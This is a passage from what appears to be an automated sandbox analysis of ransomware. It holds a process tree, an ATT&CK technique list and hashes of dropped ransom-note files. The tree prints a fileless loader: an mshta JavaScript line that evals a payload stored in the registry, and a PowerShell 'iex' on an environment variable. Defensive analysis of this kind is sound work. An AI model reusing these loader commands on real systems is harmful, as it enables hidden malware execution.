                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "-1295064559894710270101935677910424561052061736320971318949275688126-658761441"
                                                                                                                                                    1⤵
                                                                                                                                                      PID:3544
                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "624526276-155246281-33442814599843442105680136-760223965847925325-1128032771"
                                                                                                                                                      1⤵
                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                      PID:3232
                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "1594884366-144629951723563162-770154939-9493501791970724893-413015466-541920520"
                                                                                                                                                      1⤵
                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                      PID:3408
                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "-46050941079382438-1206364571-452133820361682753-592844205-1140233962-2002305445"
                                                                                                                                                      1⤵
                                                                                                                                                        PID:3580
                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "-167906552318145405271358423971100708396-2078406608-6971049951832091398-1943211719"
                                                                                                                                                        1⤵
                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                        PID:3336
                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "-2133918189-21070689-12883414591204147577-20323111861706641457-38589356-1489234142"
                                                                                                                                                        1⤵
                                                                                                                                                          PID:3276
                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "8722604281044054944-213630167014132273996271407931409110400-988368748-417501149"
                                                                                                                                                          1⤵
                                                                                                                                                            PID:4012
                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                            \??\C:\Windows\system32\conhost.exe "-15626087461180383011463932711631264377-1388561842-690508387-864785753-785738441"
                                                                                                                                                            1⤵
                                                                                                                                                              PID:3184
                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "-2131253973-1965037114438619363-2034754258-13296345891559136854702510132-83357422"
                                                                                                                                                              1⤵
                                                                                                                                                                PID:1468
                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "-20864477212788061313098445724436104611977151091-14847635137949563671531832743"
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:1784
                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "1464460734191163935120661089532042909984171217347218474639251076356151314399730"
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:1848
                                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "-726853185796965793507757727188365173715921830867275078661696677457463196713"
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:2304
                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "13098174331587176091471612370-13789282311631274786650409667-62591998761188802"
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:704
                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "17840201352135982098585859833-1490733471366849368686619771422902111-1047307295"
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:3180
                                                                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                          PID:3192
                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "-1292209840-531836360-14141665691583878087-367768627797134938-279589602055237552"
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                          PID:2476
                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "877004699-546838457-1996842930-13665794701643377795-8572901931929677706-1821413340"
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                          PID:3672
                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "255505869-145760550034687530165207104516112100941147081174-16125294872055164763"
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                          PID:3204
                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "-289995189-595895715-2378872371212796529-1767744072-1324488338873487963-1526886998"
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                          PID:3888
                                                                                                                                                                        • C:\Windows\system32\mshta.exe
                                                                                                                                                                          "C:\Windows\system32\mshta.exe" javascript:b1PVQVHpw="o";c2d=new%20ActiveXObject("WScript.Shell");uQXDb3YEw="kt";NfdK8=c2d.RegRead("HKLM\\software\\Wow6432Node\\7IVqMUzd\\k5zD1pyCyL");U2xj1MaXt="3HEYof";eval(NfdK8);gbiuCUzd1="p0hY";
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                          PID:4404
                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:ktjoh
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            PID:5584
                                                                                                                                                                            • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                              regsvr32.exe
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:2376
                                                                                                                                                                                • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                  "C:\Windows\SysWOW64\regsvr32.exe"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:4816
                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "-1872997804-443607364-15921343791748890709-1271395834392933725-192714724178938179"
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:4880
                                                                                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:5068
                                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "-943661666-1443667774-15533212334278401306954672431236111050-1220345798-2048763323"
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  PID:4728
                                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "-948403302131659095-18389577861987761279-1466848250-12600217031259455214-14746905"
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:4548
                                                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "-2082104973-540997293-661306576-1797372137122869309011687598532066714617-163557609"
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:1604
                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                      "C:\Windows\system32\rundll32.exe" "c:\Program Files (x86)\Optimizer Pro\OptProCrash.dll",ENT
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:5064
                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                          "C:\Windows\system32\rundll32.exe" "c:\Program Files (x86)\Optimizer Pro\OptProCrash.dll",ENT
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:5876
                                                                                                                                                                                        • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:4732
                                                                                                                                                                                          • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                            C:\Windows\system32\AUDIODG.EXE 0x560
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:5644
                                                                                                                                                                                            • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:4216
                                                                                                                                                                                              • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:2380

                                                                                                                                                                                                Network

                                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                Reconnaissance

                                                                                                                                                                                                Resource Development

                                                                                                                                                                                                Initial Access

                                                                                                                                                                                                Execution

                                                                                                                                                                                                Command and Scripting Interpreter

                                                                                                                                                                                                1
                                                                                                                                                                                                T1059

                                                                                                                                                                                                PowerShell

                                                                                                                                                                                                1
                                                                                                                                                                                                T1059.001

                                                                                                                                                                                                Scheduled Task/Job

                                                                                                                                                                                                1
                                                                                                                                                                                                T1053

                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                1
                                                                                                                                                                                                T1053.005

                                                                                                                                                                                                Windows Management Instrumentation

                                                                                                                                                                                                1
                                                                                                                                                                                                T1047

                                                                                                                                                                                                Persistence

                                                                                                                                                                                                Boot or Logon Autostart Execution

                                                                                                                                                                                                3
                                                                                                                                                                                                T1547

                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                2
                                                                                                                                                                                                T1547.001

                                                                                                                                                                                                Winlogon Helper DLL

                                                                                                                                                                                                1
                                                                                                                                                                                                T1547.004

                                                                                                                                                                                                Scheduled Task/Job

                                                                                                                                                                                                1
                                                                                                                                                                                                T1053

                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                1
                                                                                                                                                                                                T1053.005

                                                                                                                                                                                                Privilege Escalation

                                                                                                                                                                                                Boot or Logon Autostart Execution

                                                                                                                                                                                                3
                                                                                                                                                                                                T1547

                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                2
                                                                                                                                                                                                T1547.001

                                                                                                                                                                                                Winlogon Helper DLL

                                                                                                                                                                                                1
                                                                                                                                                                                                T1547.004

                                                                                                                                                                                                Scheduled Task/Job

                                                                                                                                                                                                1
                                                                                                                                                                                                T1053

                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                1
                                                                                                                                                                                                T1053.005

                                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                                Direct Volume Access

                                                                                                                                                                                                1
                                                                                                                                                                                                T1006

                                                                                                                                                                                                Indicator Removal

                                                                                                                                                                                                3
                                                                                                                                                                                                T1070

                                                                                                                                                                                                File Deletion

                                                                                                                                                                                                3
                                                                                                                                                                                                T1070.004

                                                                                                                                                                                                Modify Registry

                                                                                                                                                                                                5
                                                                                                                                                                                                T1112

                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                2
                                                                                                                                                                                                T1497

                                                                                                                                                                                                Credential Access

                                                                                                                                                                                                Credentials from Password Stores

                                                                                                                                                                                                1
                                                                                                                                                                                                T1555

                                                                                                                                                                                                Credentials from Web Browsers

                                                                                                                                                                                                1
                                                                                                                                                                                                T1555.003

                                                                                                                                                                                                Unsecured Credentials

                                                                                                                                                                                                1
                                                                                                                                                                                                T1552

                                                                                                                                                                                                Credentials In Files

                                                                                                                                                                                                1
                                                                                                                                                                                                T1552.001

                                                                                                                                                                                                Discovery

                                                                                                                                                                                                Network Service Discovery

                                                                                                                                                                                                2
                                                                                                                                                                                                T1046

                                                                                                                                                                                                Peripheral Device Discovery

                                                                                                                                                                                                1
                                                                                                                                                                                                T1120

                                                                                                                                                                                                Query Registry

                                                                                                                                                                                                4
                                                                                                                                                                                                T1012

                                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                                3
                                                                                                                                                                                                T1082

                                                                                                                                                                                                System Location Discovery

                                                                                                                                                                                                1
                                                                                                                                                                                                T1614

                                                                                                                                                                                                System Language Discovery

                                                                                                                                                                                                1
                                                                                                                                                                                                T1614.001

                                                                                                                                                                                                System Network Configuration Discovery

                                                                                                                                                                                                1
                                                                                                                                                                                                T1016

                                                                                                                                                                                                Internet Connection Discovery

                                                                                                                                                                                                1
                                                                                                                                                                                                T1016.001

                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                2
                                                                                                                                                                                                T1497

                                                                                                                                                                                                Lateral Movement

                                                                                                                                                                                                Collection

                                                                                                                                                                                                Data from Local System

                                                                                                                                                                                                1
                                                                                                                                                                                                T1005

                                                                                                                                                                                                Command and Control

                                                                                                                                                                                                Exfiltration

                                                                                                                                                                                                Impact

                                                                                                                                                                                                Defacement

                                                                                                                                                                                                1
                                                                                                                                                                                                T1491

                                                                                                                                                                                                Inhibit System Recovery

                                                                                                                                                                                                3
                                                                                                                                                                                                T1490

                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                Downloads

                                                                                                                                                                                                • C:\MSOCache\!HELP_SOS.hta
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  99KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  9c3ca270924b95c31dae757b0ff1f134

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  e0ce8ebe1a940cbb6dde5c8045c164089e5f8756

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  9e6e1b79df99e2fa3813f6c3a5b0d6f29db285e8c95d8321014c5d8645aa50e6

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  22c36be60da8e9893950e7228f60426a35029676b52fe90c40c554b2964d7985860e5207ed349a760d26d269be3caee885601759585a3e04c282b1d39beab919

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+ceyqr.html
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  7KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  cafdc7a0eafdd2cbfada106f9c4babdf

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  5f66233c2be1cae62eca48bbbf5f4d67a5a3ad7a

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  33779eb7e0c30220fd346bab6bc869e2ff0117fab67666afae8d254f5c2f96bf

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  087c7816ce83ce54370ea3d876b49b43ace4df6d355f524a5ffb8ebbed194974eb19d7a5a3519af2d15f4d6e6149acb4b11ecbfa36dc0ee80c7ee99bda2de05b

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+ceyqr.png
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  67KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  6d9c535f87406334d3850c966f4cc6a6

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  2b5cd4c19a22393bcbcf2dab9dbc701d5b31bb30

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  40e8ec2d0a21e792592dfe547ffec16a5aff3466cb57d3bc8aeab6a9402afe80

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  e2102fc6111c9194be8d7e02f1e636b64f8378a189bd63906010273881b62743ad996c6fd1079230eac71c71b14725e535d9034c3ebcb12d42f78cf63971b79f

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+ceyqr.txt
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  2KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  501091f1027cbd6213420aa68c11ba7f

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  9918aa426425c4360471b751d834a6890f6c1f53

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  33aadbaba1982fda075a2fb547bed63664d5b1f404249011e10eb35db98d57c7

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  5adb9b908ca8e8093eb24c6fd67c942acffc223e670631b9bec18ac58037e3e0391c418e9fd221d9712f6be6f25bae5e13469acd12fc0993902b0c56af6fa083

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+jegqi.html
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  9KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  0d1093671e4b5608afec12f5c76823b4

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  49b0a62b2192408dcaa344a0afe1556122aefdbd

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  57ea7dc2c315fa884a6602a8e327bc2dfa34a94cb50d2749f634c5a6245625b6

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  ebd025b424c7e8e0a5961943a4eabd61cb23bf0de2f4e6317adc47280efdf1e609ba2eedc6781e57f12ed158afab5c1deda04d7ab6f0f36084c0b53a09b5f2b9

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+jegqi.png
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  63KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  4a46f445eda3d69c18d3891b6f01704f

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  3940c18d4bd80fdfa68ace69292b5c3f13772298

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  99cf0354c344762ed73b07d425e2626b28446d09ec95ffcb953f50582f6ec3e6

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  98c4ca435d8932c428412c25cedf8b416e20c566d2c655b7702f22188a5cc778fc85c9b25010c42bc2d1f6367a9b0cf2d91f9a4541cd92fcb869f1750e9a31cd

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+jegqi.txt
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  1KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  19e5899e8a5e80cde88ec9b03b5aa8db

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  194a14ba220a8904d6767552d715261d2109f4fe

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  3f41a098bdc52b2b526391b37adad4d7d8ea442ac8f2ec164309bd5b6b82dac3

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  8f438f25ec2cbbdfea07b2d836a10e5a99284817fa0a22bb4e8250efeeb1066e346635c05dda0d942ab9e9aa873505b963dbf08b1c03d49e183c29c364b48b4c

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+wracr.html
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  8KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  0ef95249e1744818ccbe9fc7b98c2251

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  d2f2c82fc88abe559852a1bc1767ab25b84105e6

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  0dafb72b47f6879db24524967b6048b3e14f92d89767b7a95285b9bd30f7866c

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  3ca6ab532d16b10270d40173501403fb3c55b0960e9ff64ac6c7512e0ff5bfdfd0cfdd917dd301e93d369aea14e1ec2b85ed2d9be573e697e1680f64c58039f5

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+wracr.png
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  67KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  b0deafb7facdd646683c8707e3976143

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  80b2c9ac0ca3394779ed4ea047534ea672183471

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  4137a00c72062d2ac7a862484e3f4c7a0e5f9f353f89cf38ee0724377098f4df

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  dc1d159e059f3ae17621da0f9f7724256834604e0226bf1f3d346617e8c6b0f2e3f7647af04c70d4c161079b8b769a5225c8b16488cd3b5e31244fc69664f7e0

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+wracr.txt
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  2KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  d08c233eda08d419798b21bb6d08e06c

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  1fa9a01388e96353dfcd0cbcda93ff8b03747b3e

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  cd22e5f4e91aaffd3ae875312ebdaaaab71cd1cdb85fc9d93f84e33b4acc4d69

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  9d72a1604a4123585d82e589af58d7c6741910f4a3a2f520a56863887f882af885ce3d89572c47a91b95f42869b9b619bf7335655e2809229e668825af8b3078

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+nsubc.html
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  14KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  0ff27c10b0f7decd37166e4c31a39c05

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  cfab560666421dd7ade5757583be40e1a9f8af02

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  f602792e30b9b4cfb44dab2441d0b58fb876bd1a8d57d50736aa510deffea736

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  abc42f724a31bf88d010ac7fc26d655481aa545c62bde556632c6208c9f2bef68e6ae7bfc92b2ef29dcc7fac2307652c680c9c37096bdb7fb817b94decad9444

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+nsubc.png
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  64KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  5fe836dd66d5de1da52b07400eac8ebe

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  ec6dffcef3f3f6d8b9121b6a3ac91a5e33d58762

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  cfce8b67d410af3dfcb63afea88638fc7b8c10aa129d29a297e4f20199d87b04

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  50efd96af11f887bb42b62f4cec5cfcd5712d2b0fdb6539729d02038058e8b856783438e835710ca6c04a00e04f12bd320cc332b823e42d21ef7528079bfd6c0

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+nsubc.txt
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  1KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  3a5822f891e2de2b0403d7e10f147533

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  b482df314ed19caac4cbd9ed41c35eb5a5623775

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  1fd5235b66584cc4aab80f4052fa2c9673f82d4788e0c45f9c9c53fd4169f35a

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  774a996a0bc50b9d45a11ce1b199f20997f2a21c96052eca710483337effe86d2a5032c13ab112ffe1239eaf2b1325e8d7fcaf1b22f2a52c8184ff91536f755a

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\PerfLogs\Recovery+ceyqr.html
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  7KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  3ceab62f7e2fa8f5631ab189581b964a

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  55d107ecb1120b8c2be27324e818e2b72298d4e7

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  c9a4c7ed4a950cb733ee64ace9a2e05a08b7b53ab2f8108ac0862b33642bc166

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  967a51b059836931ea2ac21f6fcc65ff55af453f603ea121134fc2c7f1e9689765f89f668f548ff953e57189b843c1d299c5610caa47572aecdce30b4cdf1639

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\PerfLogs\Recovery+ceyqr.png
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  67KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  515befd791dee0e076dca7b8636b4be4

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  0b079131bef9e679804561370283427706f8648f

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  d2ffa1e98f1f5b67cf57c03cf0ea9e0338183f7137f7705f0e6b7f2f3bb28b59

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  945f3741d8eaa602b2ef92aef024d2b768d3247c592f45ca367259b4ec72d4fa6053e5f53b025e19b1116447709f1e528df7f80cdb3c170d55dcf659be7ab8a4

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\PerfLogs\Recovery+wracr.html
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  9KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  1431f816df9019a8027c7c8e4c4498cf

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  fa6b3fe41a055f321a0eb592c1bbdd88dc8847b3

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  3c7696b2f08d8223a2644e4ca82c3747ec5542e493ac2588c1d8a1f4f9824b75

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  72b553a916aea97a590ce3a229e3ebfefa002d828a65d8e7d05d7309d45c26e84f6dc0db0a049d083db480d592d3272a92d275cbffa53a118af71cb37e0e7a27

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\PerfLogs\Recovery+wracr.png
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  67KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  0d84f7ced155b455d0478b134031d86f

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  046a95e9954349c2d45b494854b8825bd3510fba

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  7ad041c96a408d913ff1ab9fdc1d1a6cc12fc418aa448c803b9e4c64a5e74e25

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  e9ccb4ac100f658e93dfb274859c4c69c071f786898e152109f1b049b25f7011b2d3c0f7d1774b1e1b2a1724e383790a19b78563e83099eccbe3d8aa7e911953

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  27KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  1ccd823e4e5adf03f7dad4b2d6eb9bae

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  af09e5cb6f58268c8d905fcb1b2f0a2856b56ec3

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  72df67218eb0719a0926e52b3827fd6aeb5409240d684153e8101de1f9a68cab

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  f275691ed9dfd60c5021c2a1cc52b29da108177c92b2b301d5d5a01e30d700230b303b117bf59aa1d9cf04b04576b843d8b522b6b60bb1c27ef0c8d5039ad851

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\background.gif
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  6KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  a8ddba4140eb4a62c0058d3c10e82dd6

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  89e641cd1d1b5bc39d57a196e11c553d604d555a

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  eee57e3116372a8da25668c36631506b2559e183971a7d1c81f6c37d9f247508

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  c842d4231b38dad4f396438dc1d165ff9c61cf310991dba6b27f35ab828fd698cb11361843974ac46691c65d09117c81071ba290e25eed96bad35b24715c6905

                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl\HEADER.GIF
                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                  26KB

                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  1eed645fcd47b338d7c4f56b494caf84

                                                                                                                                                                                                  SHA1

